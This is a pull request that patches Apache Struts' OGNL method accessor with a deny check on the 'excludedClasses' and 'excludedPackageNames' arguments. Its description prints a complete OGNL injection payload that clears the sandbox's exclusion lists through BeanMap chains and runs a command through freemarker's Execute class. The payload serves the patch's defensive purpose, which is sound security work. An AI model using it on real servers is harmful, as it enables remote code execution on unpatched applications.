### PR TITLE
Update XWorkMethodAccessor.java

### DIFF
--- a/core/src/main/java/com/opensymphony/xwork2/ognl/accessor/XWorkMethodAccessor.java
+++ b/core/src/main/java/com/opensymphony/xwork2/ognl/accessor/XWorkMethodAccessor.java
@@ -95,6 +95,11 @@ public class XWorkMethodAccessor extends ObjectMethodAccessor {
 
     private Object callMethodWithDebugInfo(Map context, Object object, String methodName, Object[] objects) throws MethodFailedException {
         try {
+                for(Object o:objects){
+                      if( "excludedClasses".equals(o) || "excludedPackageNames".equals(o) ){
+			      throw new NoSuchMethodException( methodName + o );
+		      }
+                }
             return super.callMethod(context, object, methodName, objects);
 		}
 		catch(MethodFailedException e) {


### PR DESCRIPTION
block unknow exp to clean excludedPackageNames and excludedClasses
if attacker use 'excluded'+'PackageNames' likes blow, this patch deny list also can protect structs
```
%{
(#request.a=#@org.apache.commons.collections.BeanMap@{}) +
(#request.a.setBean(#request.get('struts.valueStack')) == true) +
(#request.b=#@org.apache.commons.collections.BeanMap@{}) +
(#request.b.setBean(#request.get('a').get('context'))) +
(#request.c=#@org.apache.commons.collections.BeanMap@{}) +
(#request.c.setBean(#request.get('b').get('memberAccess'))) +
(#request.get('c').put('excluded'+'PackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet())) +
(#request.get('c').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet())) +
(#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'calc'}))
}

```
![image](https://user-images.githubusercontent.com/22064977/172624017-8c15ca1a-66e5-4383-9215-c52ed7c5468a.png)
